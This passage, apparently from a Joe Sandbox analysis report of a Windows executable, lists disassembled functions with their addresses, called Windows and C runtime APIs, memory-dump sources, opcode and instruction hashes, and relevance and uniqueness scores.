                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                      • String ID: rtmp
                                      • API String ID: 3587137053-870060881
                                      • Opcode ID: 2fe5fbcff99fc9507cc17e5606f473ac87ac8f10dc599feaa6c4721c02e64643
                                      • Instruction ID: 1c3008000ea0064e45fd4749509170358de37ca8e1e79511825dc1b07ca4e00b
                                      • Opcode Fuzzy Hash: 2fe5fbcff99fc9507cc17e5606f473ac87ac8f10dc599feaa6c4721c02e64643
                                      • Instruction Fuzzy Hash: 7DF1DF22B08B8285EF10DF65D8801BD67A1EF85788F581672EA4DE7BA9DF3CD584C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A365B20 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1693479884-0
                                      • Opcode ID: ff03b4dd7c267ba7113e5d86362d42cdaf99bc6da73fd8bf745a729d61054135
                                      • Instruction ID: cefcdbf12853f1cb336d2d278f68602892a295a52b2dcbda40c63bc40760b129
                                      • Opcode Fuzzy Hash: ff03b4dd7c267ba7113e5d86362d42cdaf99bc6da73fd8bf745a729d61054135
                                      • Instruction Fuzzy Hash: 30A19262F15B5285FF048FB9D8445BD2361AF85BA8B585275DE2DF7BC9DE3CE0818200
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3830F0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                      • String ID:
                                      • API String ID: 3140674995-0
                                      • Opcode ID: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                      • Instruction ID: 2089d55e0e4cebe574e7b313dd25a3efb2f1b7f5200c3f336c1318a578f879d8
                                      • Opcode Fuzzy Hash: 0807455d0555d650f040b04fa66349818bf1af33e15178971619a7c0969c3fb0
                                      • Instruction Fuzzy Hash: DC315076609B8299EB609F60E8903ED7764FB84748F484079DA4ED7B98DF38D548C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A387658 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                      • String ID:
                                      • API String ID: 1239891234-0
                                      • Opcode ID: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                      • Instruction ID: 53d163f5c77d8bd3e8ae5b71bbdd634cb426a924d25a3cf9af4cec21280bdc5d
                                      • Opcode Fuzzy Hash: ad4a7a01f5f8e7c35986f1c3a3571837895acf53bea511e166d2dcba98ee745e
                                      • Instruction Fuzzy Hash: 8F318436609B829ADB60CF25E8402AE77A4FF84758F580175EA9DD3B58DF3CD545CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A351AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 03cf03922f8e963b9c545b117e3dfb1ed80d273b657bcb82ca2a71330a30b635
                                      • Instruction ID: 4e44441f32f5c22aeb2dfe440ffe308f09b7c92804614e7a5ed8b73f8fa73cbd
                                      • Opcode Fuzzy Hash: 03cf03922f8e963b9c545b117e3dfb1ed80d273b657bcb82ca2a71330a30b635
                                      • Instruction Fuzzy Hash: 29B1C322B1578686EB10AB69D8402ED23A1FF8979CF585271EE4DE7B99EF3CD540C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38FA14 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                      Download Yara Rule
                                      APIs
                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF65A38FA44
                                        • Part of subcall function 00007FF65A3878B4: GetCurrentProcess.KERNEL32(00007FF65A390C4D), ref: 00007FF65A3878E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                      • String ID: *?$.
                                      • API String ID: 2518042432-3972193922
                                      • Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                      • Instruction ID: 46f857de5d729929ff2855a6ee7326a8a5571514fc84a02e820eeca771162534
                                      • Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
                                      • Instruction Fuzzy Hash: 1C51D462B16B9686EF11DFA298104BC67A4FF48BDCB584571DE1DE7B8ADE3CD0428300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A392000 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: memcpy_s
                                      • String ID:
                                      • API String ID: 1502251526-0
                                      • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                      • Instruction ID: 864251893c04142937c8b687c11a188bf635dd022c9d031e65ffbe79929bc785
                                      • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                      • Instruction Fuzzy Hash: B8D19432B196868BDB64CF55E28466AB791FB98748F188134DB4EE7B44DF3CE845CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A35B6E8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorFormatFreeLastLocalMessage
                                      • String ID:
                                      • API String ID: 1365068426-0
                                      • Opcode ID: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
                                      • Instruction ID: b5100b73659d7dea7007d7f5b6dd1614ecdc6f2559eaf43478e46366653578a8
                                      • Opcode Fuzzy Hash: a3eefe559d296bd36c1cae37cf4e1e300267d0d32691df0dd3a6d40942d78c6b
                                      • Instruction Fuzzy Hash: 21012C7160874286E6108F66F85117AA791BF8ABC8F084074EA4DD7B85DE3CE5058700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38FC20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 2fd9fb95ed6a4284651077151a4f0b6093c6589f12268630e25181bc308688a6
                                      • Instruction ID: 27d810b8a8229d4221bdd27f2d7624dfa52e78bca2201e2369cdf401ef826d2d
                                      • Opcode Fuzzy Hash: 2fd9fb95ed6a4284651077151a4f0b6093c6589f12268630e25181bc308688a6
                                      • Instruction Fuzzy Hash: 7A31E922B1569245FB209F36A8057B97A91AF45BE8F188275DE6CD7BC6CE3CD5058300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A395A78 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise_clrfp
                                      • String ID:
                                      • API String ID: 15204871-0
                                      • Opcode ID: dd850569bf3cdd24e5cff22b07788c07adbe1485687e236f21ba57eb0d1323aa
                                      • Instruction ID: fb1ba492b8755040135d3bc79c9396cadd5bcf756ade78e32c5be789719d6d42
                                      • Opcode Fuzzy Hash: dd850569bf3cdd24e5cff22b07788c07adbe1485687e236f21ba57eb0d1323aa
                                      • Instruction Fuzzy Hash: 3BB14873604B898BEB15CF29C9863683BA0FB44B4CF188961DA5DD77A8CF39D495C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A378D74 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ObjectRelease$CapsDevice
                                      • String ID:
                                      • API String ID: 1061551593-0
                                      • Opcode ID: 889094c01c96e48fc0bc8d6bac5bcd56f2ce6fd0cf7844abad017e09edda8be2
                                      • Instruction ID: 37e94ec9b0808d61397effb8c81451a20753f608cfcbd6477ddde16bea4a1f44
                                      • Opcode Fuzzy Hash: 889094c01c96e48fc0bc8d6bac5bcd56f2ce6fd0cf7844abad017e09edda8be2
                                      • Instruction Fuzzy Hash: 4881E936B18A058AEB10CF6AE4406AD7771FB88B88F544562DE0DE7B64DF38E649C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37A24C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                      • Instruction ID: 63385b34bdb6c593c8c29e4ec04dee2d7c273f9fbff6e29a8c3c195dc12c098e
                                      • Opcode Fuzzy Hash: d9124697dc7a8d84d5d498c11f979aef44ae65fa130e56fd134fc764616be2af
                                      • Instruction Fuzzy Hash: 3F116D32A19B8596E7618F61F4007E97761FF88B88F884175DA4DE3614DF3CD545C704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A361224 Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A362480: CreateFileW.KERNELBASE ref: 00007FF65A36255B
                                        • Part of subcall function 00007FF65A362480: GetLastError.KERNEL32 ref: 00007FF65A36256E
                                        • Part of subcall function 00007FF65A362480: CreateFileW.KERNEL32 ref: 00007FF65A3625CE
                                        • Part of subcall function 00007FF65A362480: GetLastError.KERNEL32 ref: 00007FF65A3625D7
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A361588
                                        • Part of subcall function 00007FF65A363940: MoveFileW.KERNEL32 ref: 00007FF65A36397D
                                        • Part of subcall function 00007FF65A363940: MoveFileW.KERNEL32 ref: 00007FF65A3639F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 34527147-0
                                      • Opcode ID: 718b4ceb9e8928102439ddb9a4ad3df85beca7c7916738bc2119cc3b908d80fb
                                      • Instruction ID: 817feb734cc0d9b70489fd65f57c904e9fbbebb26f13e14823b5ba7e02fa72a6
                                      • Opcode Fuzzy Hash: 718b4ceb9e8928102439ddb9a4ad3df85beca7c7916738bc2119cc3b908d80fb
                                      • Instruction Fuzzy Hash: 5D91AD22B28A4682EE10DF66D4442BE63A1FF94BC8F584072EE4EE7B95DE3CD545C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A364E70 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 0845348443bdcef02aa75bae9a0381c53b3b081d4eec6718d375521dafbbd6da
                                      • Instruction ID: e5f4060e293f462799d709958655ce653472be626319d9eb58f8c18895f11b7c
                                      • Opcode Fuzzy Hash: 0845348443bdcef02aa75bae9a0381c53b3b081d4eec6718d375521dafbbd6da
                                      • Instruction Fuzzy Hash: 38018471D4D98689FA708720B5153B637919F5A30DF4C02F0C6AEE73A1CE3CA4448A08
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A388B9C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: 0
                                      • API String ID: 3215553584-4108050209
                                      • Opcode ID: 0bdc5fc199a0cdb7e5e4fe1bb73b5790fb45139705c0e0a4982304375264cdf5
                                      • Instruction ID: 11721fdc3b9582a7de2a60ef6197fbd33c024b7b5535d1598ffee60388adf898
                                      • Opcode Fuzzy Hash: 0bdc5fc199a0cdb7e5e4fe1bb73b5790fb45139705c0e0a4982304375264cdf5
                                      • Instruction Fuzzy Hash: FF810122A1B60346EBA88A25948067D6BE1EF41BCCF5C19B1DD09F779DCF2DE846D700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A388920 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: 0
                                      • API String ID: 3215553584-4108050209
                                      • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                      • Instruction ID: 37fbc3fcd85e8a9be6dae084de1e4dcf6af22b340b7b92cfb77c6d55f115a3bd
                                      • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                      • Instruction Fuzzy Hash: 7A710821A1E28347FBB88A25908027E6FD19F817CCF1C15B5DD49F76D6CE2DE8468741
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36C928 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: 8e61a0345426cfbf98e966bfd6dd27ed2445dff38cff5604a39dc23a55b332d0
